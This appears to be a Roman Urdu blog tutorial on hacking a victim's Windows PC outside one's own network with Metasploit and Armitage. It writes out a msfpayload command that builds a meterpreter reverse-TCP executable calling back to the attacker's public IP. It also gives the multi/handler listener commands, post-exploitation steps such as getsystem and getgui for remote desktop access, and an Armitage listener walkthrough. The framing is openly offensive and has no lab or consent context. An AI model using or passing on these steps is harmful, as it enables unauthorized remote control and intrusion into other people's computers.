How Hack Out Of Network Armitage Metasploit

 

Assalamoalikum Friends ,
Note plz ! Commands Ka Colour Red.. Hy


Ajj hum Sekhengy Ky kisi bhi Out of Nework Py Apna Payload kasy Bnna kar Send Karty Han Aor Kasy hUm Listen karty han humary victim ko..
Acha to friends humary pass 2 Tareqy hoty han apny Victim ko  Hold karny ky..

ist Option  ""Metasploit Multi Handler Reverse Tcp""
2nd Option  ""Armitage""
Metasploit Manual Tariqa hy jis sy Hum Log Commands Ky Thru Apny Victim Ko Handel Karty Han , Aor Armitage Graphical Hota hy , Us mein Humien Sab Graphical Option's Milty Han...


Ok !
     To Start Karty Han..
                       Sab sy Pahly Hum Terminal Open Karengy Aor Wahan Apnaa Payload Tyar karengy Aor yahan Py Kuch Chezien Btana Lazmi Smajhta Hoon Jo Ky Ap Ko Anni Cahiyien , Sab sy Pehli Chiez Humien Port Bnana Anna Cahiye To Ap Ka Jo Dil Kary Wo Port Forword Kar sakty Han Apny Admin modem Page Sy , Dosri Chiez Jo Sab Sy Ahem Hy ""Agar Hum Apny Hi Network Py Hack Karna Cahty Han Kisi Ko To"" ( Payload Bnaty waqt Hum LHOST ki jagan apni Local ip dalemgy ) Jo ky example >> 192.168.1.3  Hogi Aor Important Chiez sab sy Agar Hum Out Of Network Kisi Ko Hack Karna Hy To Humien (  LHOST mein Apni"" External""Public ip"" Deni Hy ) To Ab ap logoon ko smaajh A gya ho ga Aor Ap ki External ip Kia hy Us Ko check Karny ky Liye Ap Google Mein Ja Kar Likhien >>Whats my ip<<  To ap Ki external public ip A jay Gi Apny network sy Bahir Hack Karny Ky liye Hum Hamesha Apni Public external ip Dyngy LHOST mein ok To start Karty Han...
Terminal Open Karien aor command hy Red Colour Mein Nichy wali Line


 
msfpayload windows/meterpreter/reverse_tcp LHOST=122.178.114.146 LPORT=4444 x > /root/your-file-name.exe 



Acha To Friends Ap log Tasveer Mein Dekh Rahy Han Jaisa Ky Mein Nay Command Di Hy Mein Out of Network Hack Kar Raha Honn Victim Ko To Mein Nay LHOST Ky samny Apni External ip Di hy aor Port 4444  Ap ka Port Aor Ip Change Hoga..

 
Ok Comamnd Fill Karny ky bad Hit Enter..


Thora sa Time ly ga Humara Pay load Ban Chukka Hy Aor Yea Humari Home>>root Folder Mein Save Ho Jay Ga...
 
Important ! ! !

Plz Read Carefully  Thing Jo Payload creat kiya hy us ki Property Mein Ja Kar Perrmissions Ky Tab mein Select Karny ky bad File Ko Excute karna na bholien simple hy apny Payload par right click karien and property mein jayien and wahan Permissions Mein Tik Mark Kar Deyn Excute waly khany par....
Ok Pehla Tariqa hy . Matasploit Mein Handle Karty Han Pahly To Sab Sy Pahly Ap Ko Terminal Kholna hy 1 aor  Command Hy..
msfconsole    


            

Jaisa ky pic mein hy aysa khul jay ga us ky bad Wahan Usi Terminal mein Ap Nay Type Karni Ky Command hy..

use exploit/multi/handler

Us Ky Bad ..

set PAYLOAD windows/meterpreter/reverse_tcp

Abhi ap ko apna local ip yahan dena hy local ip dekhny ky liye terminal mein ifconfig type karien..

set LHOST 192.168.1.7

Phir Port Select Karty Han..

set LPORT 4444

oK Ab Last Command Hy..

Exploit

Ab Jasy Hi Ap Ka Victim File Ko Kholy Ga Jo Hum Nay Bnai Thi To Humara Victim Humien Yahan Exploit Ky Bad Nechy Show Ho Jay Ga Jasa Ky Picture Mein Hy..
Kuch Commands han Jo ap Ko System Ko Hack Karny Ky Bad Kam Atti Han Like 

help   << Help Likhny par Humary Samny Bouth Si Commands A Jayengi Humari Screen Par Un Mein Sab Samjhaya Gya Hy Ess Kt Ilawa Kuch Commands Han Jo mein Nechy Likh Raha Hoon Mybe Ap Logoon Ky Kam Ayengi...

 Commands List..
help 
getsystem
getuid
Agar Ap Cahty Han Ky Remote System Dekhien Apny Victim Ka Too..
Victim Ky Pc Mein Remote Desktop Setting  Enable Karny ky Liye Yea Command hy..

run  getgui -u username -p password

Ok Ess command Ky Bad New Terminal Window Open Karien aor Command Deyn..

rdesktop -u username -p password slave's-ip

Ok , Jab Hum Apna Kam Khatam Kar Lyngy Victim Ky Pc Mein Sy To Just Exit Type Karien Session Close Karny Ky Liye...



 Ok To friends Apna Port Forword Karna Na bholien Apni Local Ip ky Sath Ab Armitage Ka Tariqa Armitage Ky Liye Bhi Yeahi Payload  Chalyy Ga..  To apny Armitage Ko Kholny Ky Liye Ap Nay Terminal Kholna Hy Aor Us Mein Command Deni Hy...
 
armitage
 

Phir Box Ayy Ga Us Mein Koi Changing Nahi Karni  Connect py Click Karien And Again Yes Par with in 2-3 Mint Ap Ka Armitage Khul Jay Ga Jaisa Ky Picture Mein Hy
Us ky Bad Humien wahan
First Option Armitage Par Click Karna Hy Aor Wahan 6th Option Hy Listeners ka wahan Click karengy Then Reverse (wait for) par click karengy and wahan Box mein Apna wo Port Dyngy Jo hum Nay apna Payload Bnaty waqt Diya Tha Aor Type Mein Meterpreter Select Karky Start Listener Pay click Karengy  Yea leyn Friends Humara Listener Start Ho Chukka Hy Ap Jasy Hi Humara Victim Payload Par Click kary ga us ka System a jay ga humari Armitage Ki Screen Mein Aor Phir Humary Pas Kafi Options Han Agt Bhi Us Ki Detail Nikalny Ky Liye Wo Sab Next Tutorial Mein Ajj Ky Liye Itna Hi Ijazat Dijiye Allah Hafiz.... 

 
                                        PAKISTAN ZINDABAD PAKISTAN PAINDABAD


If u have any Question , Add me on Skype My ID is   ""hacker.ss1""

Source From : http://linux-commands-backtrack.blogspot.com

No comments:

Post a Comment